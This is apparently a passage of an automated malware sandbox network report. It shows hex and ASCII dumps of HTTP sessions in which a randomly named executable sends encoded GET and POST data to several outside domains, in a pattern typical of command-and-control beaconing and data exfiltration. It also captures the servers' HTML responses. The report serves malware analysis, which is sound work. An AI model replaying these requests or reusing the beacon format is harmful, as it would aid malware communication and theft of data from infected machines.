                                                                      Nov 7, 2024 15:29:06.450450897 CET1236INData Raw: 35 34 39 2e 38 37 39 22 20 63 79 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e
                                                                      Data Ascii: 549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy
                                                                      Nov 7, 2024 15:29:06.450515032 CET212INData Raw: 2d 32 35 2e 34 35 35 6c 31 35 2e 36 39 34 2d 35 38 2e 35 33 37 0a 09 09 09 63 33 2e 38 38 39 2d 31 34 2e 35 30 34 2c 31 38 2e 37 39 39 2d 32 33 2e 31 31 2c 33 33 2e 33 30 33 2d 31 39 2e 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34
                                                                      Data Ascii: -25.455l15.694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id=
                                                                      Nov 7, 2024 15:29:06.454427958 CET1236INData Raw: 22 61 6e 74 65 6e 6e 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20
                                                                      Data Ascii: "antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <c


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.849997199.192.19.19805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:08.320657969 CET481OUTGET /azuc/?F2=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRjS9f0ml2OHl666AhHB2VhosEmVxlyD8Sfr3+gvtJ58MzMw==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.demovix.xyz
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:29:09.004515886 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 07 Nov 2024 14:29:08 GMT
                                                                      Server: Apache
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Content-Length: 16026
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                      Nov 7, 2024 15:29:09.004534960 CET1236INData Raw: 31 2d 34 2e 36 36 38 2c 38 2e 34 32 31 2d 39 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e
                                                                      Data Ascii: 1-4.668,8.421-9.196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087
                                                                      Nov 7, 2024 15:29:09.004548073 CET1236INData Raw: 38 35 2d 35 2e 35 35 35 2c 31 34 31 2e 30 38 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                      Data Ascii: 85-5.555,141.085-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,12
                                                                      Nov 7, 2024 15:29:09.004559040 CET1236INData Raw: 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22
                                                                      Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <li
                                                                      Nov 7, 2024 15:29:09.004573107 CET848INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                      Nov 7, 2024 15:29:09.004585028 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 32 37 2e 35 35 22 20 79 31 3d 22 32 39 35 2e 31 38 39 22 20 78 32 3d 22 32 33 35 2e 33 38 37 22 20 79 32 3d 22 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20
                                                                      Data Ascii: x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                      Nov 7, 2024 15:29:09.004599094 CET1236INData Raw: 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22
                                                                      Data Ascii: necap="round" stroke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" str
                                                                      Nov 7, 2024 15:29:09.004611969 CET424INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f
                                                                      Data Ascii: <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" strok
                                                                      Nov 7, 2024 15:29:09.004838943 CET1236INData Raw: 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 35 34 39 2e 38 37 39 22 20 63 79 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30
                                                                      Data Ascii: ="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620"
                                                                      Nov 7, 2024 15:29:09.004978895 CET1236INData Raw: 34 2d 31 34 2e 33 36 39 2d 31 34 2e 36 39 32 2d 32 35 2e 34 35 35 6c 31 35 2e 36 39 34 2d 35 38 2e 35 33 37 0a 09 09 09 63 33 2e 38 38 39 2d 31 34 2e 35 30 34 2c 31 38 2e 37 39 39 2d 32 33 2e 31 31 2c 33 33 2e 33 30 33 2d 31 39 2e 32 32 31 6c 35
                                                                      Data Ascii: 4-14.369-14.692-25.455l15.694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna">
                                                                      Nov 7, 2024 15:29:09.011265039 CET1236INData Raw: 2e 39 36 36 2c 36 2e 36 37 38 2d 31 34 2e 35 39 34 63 32 2e 33 34 34 2c 31 2e 33 34 33 2c 34 2e 33 38 33 2c 33 2e 32 38 39 2c 35 2e 38 33 37 2c 35 2e 37 39 33 0a 09 09 09 09 63 34 2e 34 31 31 2c 37 2e 35 39 36 2c 31 2e 38 32 39 2c 31 37 2e 33 33
                                                                      Data Ascii: .966,6.678-14.594c2.344,1.343,4.383,3.289,5.837,5.793c4.411,7.596,1.829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" />


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.849998208.91.197.27805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:14.395114899 CET759OUTPOST /bnrz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.palcoconnector.net
                                                                      Origin: http://www.palcoconnector.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.palcoconnector.net/bnrz/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 44 53 5a 51 77 74 75 50 74 4c 35 6a 52 4c 6f 48 44 70 41 51 4c 72 6f 69 6f 78 76 50 68 70 41 39 61 4b 34 48 6a 31 35 51 51 4a 6e 51 4a 46 77 32 31 7a 4a 51 33 64 4e 62 61 4b 32 6a 70 57 39 7a 36 45 51 36 31 30 31 35 6a 52 70 58 77 7a 71 34 69 4e 73 74 6a 50 41 57 6d 66 4a 47 69 41 2b 6c 2b 33 4b 79 39 55 47 62 46 2b 6c 71 2f 49 65 77 6b 48 6e 65 5a 50 6e 41 31 61 37 5a 78 4e 6b 31 38 63 51 42 73 47 4e 45 49 45 6d 48 76 77 32 55 36 61 37 69 54 4e 34 78 72 44 44 31 57 51 32 35 6b 34 31 32 47 59 7a 70 69 31 65 48 4d 49 4e 6f 7a 50 7a 64 45 6d 37 77 58 39 52 6c 64 4b 61 31 45 72 2b 69 39 48 73 3d
                                                                      Data Ascii: F2=DSZQwtuPtL5jRLoHDpAQLroioxvPhpA9aK4Hj15QQJnQJFw21zJQ3dNbaK2jpW9z6EQ61015jRpXwzq4iNstjPAWmfJGiA+l+3Ky9UGbF+lq/IewkHneZPnA1a7ZxNk18cQBsGNEIEmHvw2U6a7iTN4xrDD1WQ25k412GYzpi1eHMINozPzdEm7wX9RldKa1Er+i9Hs=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.849999208.91.197.27805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:16.931986094 CET779OUTPOST /bnrz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.palcoconnector.net
                                                                      Origin: http://www.palcoconnector.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.palcoconnector.net/bnrz/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 44 53 5a 51 77 74 75 50 74 4c 35 6a 53 72 34 48 46 4f 55 51 63 62 6f 68 6e 52 76 50 30 5a 41 35 61 4b 38 48 6a 77 59 4e 51 36 44 51 4a 6b 41 32 30 33 64 51 30 64 4e 62 50 36 32 6d 78 32 39 34 36 45 63 45 31 77 78 35 6a 52 56 58 77 32 57 34 69 2f 45 69 35 2f 41 55 72 2f 4a 45 73 67 2b 6c 2b 33 4b 79 39 55 53 78 46 2b 39 71 38 39 57 77 6b 6d 6e 64 51 76 6e 42 32 61 37 5a 31 4e 6b 4c 38 63 52 78 73 43 56 75 49 42 36 48 76 78 6d 55 36 4f 76 39 64 4e 34 33 6d 6a 43 36 52 69 65 30 6a 62 70 34 62 71 7a 76 73 47 2b 6c 4e 2b 67 43 70 74 37 62 48 6d 54 62 58 2b 35 54 59 39 48 64 65 49 75 53 6a 51 37 6f 55 30 6f 75 74 48 71 74 39 33 73 70 4d 57 32 6d 7a 6f 54 56
                                                                      Data Ascii: F2=DSZQwtuPtL5jSr4HFOUQcbohnRvP0ZA5aK8HjwYNQ6DQJkA203dQ0dNbP62mx2946EcE1wx5jRVXw2W4i/Ei5/AUr/JEsg+l+3Ky9USxF+9q89WwkmndQvnB2a7Z1NkL8cRxsCVuIB6HvxmU6Ov9dN43mjC6Rie0jbp4bqzvsG+lN+gCpt7bHmTbX+5TY9HdeIuSjQ7oU0outHqt93spMW2mzoTV


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.850000208.91.197.27805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:19.478890896 CET1796OUTPOST /bnrz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.palcoconnector.net
                                                                      Origin: http://www.palcoconnector.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.palcoconnector.net/bnrz/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 44 53 5a 51 77 74 75 50 74 4c 35 6a 53 72 34 48 46 4f 55 51 63 62 6f 68 6e 52 76 50 30 5a 41 35 61 4b 38 48 6a 77 59 4e 51 36 4c 51 4a 32 49 32 31 51 68 51 31 64 4e 62 4f 36 32 6e 78 32 39 6c 36 45 30 2b 31 77 39 48 6a 58 5a 58 78 55 75 34 6b 4c 51 69 73 76 41 55 69 66 4a 4a 69 41 2f 6e 2b 33 36 75 39 55 43 78 46 2b 39 71 38 38 6d 77 30 6e 6e 64 57 76 6e 41 31 61 37 46 78 4e 6c 6d 38 59 46 48 73 43 42 55 4c 79 69 48 75 52 57 55 2f 37 37 39 56 4e 34 31 68 6a 44 6c 52 69 44 30 6a 62 31 53 62 72 58 4a 73 46 75 6c 50 50 52 2b 75 64 6e 34 51 41 4c 61 4d 64 35 51 57 36 6a 72 42 5a 57 2b 72 53 7a 4c 51 6c 59 32 71 56 6a 69 36 58 31 41 5a 77 65 43 38 2f 79 56 61 4b 57 71 44 65 70 63 7a 41 39 2b 46 74 4b 43 34 42 64 75 48 4a 69 35 55 38 4a 53 34 64 46 4a 6f 53 6a 66 39 2b 74 55 41 4e 36 70 35 53 55 6f 31 37 54 6d 52 31 72 38 43 67 6b 38 71 62 67 6e 58 4f 31 39 37 2b 5a 33 57 47 66 75 66 56 65 55 64 75 43 79 57 34 68 6d 46 70 7a 75 5a 34 32 65 7a 68 38 71 79 41 52 7a 4c 6b 7a 30 41 69 51 6a 67 73 51 [TRUNCATED]
                                                                      Data Ascii: F2=DSZQwtuPtL5jSr4HFOUQcbohnRvP0ZA5aK8HjwYNQ6LQJ2I21QhQ1dNbO62nx29l6E0+1w9HjXZXxUu4kLQisvAUifJJiA/n+36u9UCxF+9q88mw0nndWvnA1a7FxNlm8YFHsCBULyiHuRWU/779VN41hjDlRiD0jb1SbrXJsFulPPR+udn4QALaMd5QW6jrBZW+rSzLQlY2qVji6X1AZweC8/yVaKWqDepczA9+FtKC4BduHJi5U8JS4dFJoSjf9+tUAN6p5SUo17TmR1r8Cgk8qbgnXO197+Z3WGfufVeUduCyW4hmFpzuZ42ezh8qyARzLkz0AiQjgsQ3e50uoe4cKHN7wehzcLfeT819cg3lLMrDSoKMTe7iREpTGVjWDiTR7TVgDOJHDReLctWGnSzClFT9StWpjSMxE0GVlg7LVDNzZvKVFa8gTNubsbjrQE8sRMAZmCB1dmsSGlTLiTt4diglHqOyHO5SYZsnBPaGDsXI2fuuhdMkkoqcL72WLq82BJqEOQiBNgXNX5/oWbEi3pvNeW2Bqd3E2xKafl2MrPO1apiA4nMV0n6aj/knHTIq8S/gxndIx5xlAGuXiMnbjKr4GFqbP9cHsJQmL4VYcCSH8keOrX79gU7Cx/aJCH4l/5KQ+y7JwVns8XkLDv7puX07LNr5hhAZKloiZ2OCWKcdMUVrE9R8yZ3dNrKTGUFajbp3D31j7acTlQWVoPyw8a9/TGpWA21qj16rzsGRAvRXxovtJTLf4uXvZvqCvJgWwSnL5JJdtKHLzRe8R7loTF+lKXihbrXXKO1VFHG6iJkxy+BvwiZ04AfX92ybSVbWI0NuKkx1jTg1RXPk68ECb+27B+Ga/mLXuJAREodD3FWdWwDTyX+q20QK7Yafuuk1aAzxzj2+lzd0cht01QDEG7q2crpsn7WdaWWoOyoO9N9eY9S1h+bfbrSxDx1cjgq+Zbe8nq5zkT/NZ1kKiNY3HALuuAkKHA9WIGwFP9Rvb0ggs [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.850001208.91.197.27805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:22.023922920 CET488OUTGET /bnrz/?F2=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq485u0/vrhbrCPm9Wbu3FX/PMpZ3p2821/Za72d+YrU3sps/g==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.palcoconnector.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:29:23.075236082 CET1236INHTTP/1.1 200 OK
                                                                      Date: Thu, 07 Nov 2024 14:29:22 GMT
                                                                      Server: Apache
                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_K4B1jeAfL0lberQynNRxWl8InwzYqMruPu0iDmZnsmUl2KoyGXZ83tucxKLhMcLq/ypJw5/90ehqILtjVgiKMg==
                                                                      Content-Length: 2630
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 4b 34 42 31 6a 65 41 66 4c 30 6c 62 65 72 51 79 6e 4e 52 78 57 6c 38 49 6e 77 7a 59 71 4d 72 75 50 75 30 69 44 6d 5a 6e 73 6d 55 6c 32 4b 6f 79 47 58 5a 38 33 74 75 63 78 4b 4c 68 4d 63 4c 71 2f 79 70 4a 77 35 2f 39 30 65 68 71 49 4c 74 6a 56 67 69 4b 4d 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_K4B1jeAfL0lberQynNRxWl8InwzYqMruPu0iDmZnsmUl2KoyGXZ83tucxKLhMcLq/ypJw5/90ehqILtjVgiKMg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.palcoconnector.net/px.js?ch=
                                                                      Nov 7, 2024 15:29:23.075258970 CET1236INData Raw: 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 63 6f 63 6f 6e 6e 65 63 74 6f 72 2e 6e 65 74 2f 70 78 2e 6a
                                                                      Data Ascii: 1"></script><script type="text/javascript" src="http://www.palcoconnector.net/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0p
                                                                      Nov 7, 2024 15:29:23.075272083 CET1002INData Raw: 73 22 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c
                                                                      Data Ascii: s"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><scrip


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.850002156.242.132.82805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:28.585345984 CET750OUTPOST /b6g5/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.shanhaiguan.net
                                                                      Origin: http://www.shanhaiguan.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.shanhaiguan.net/b6g5/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
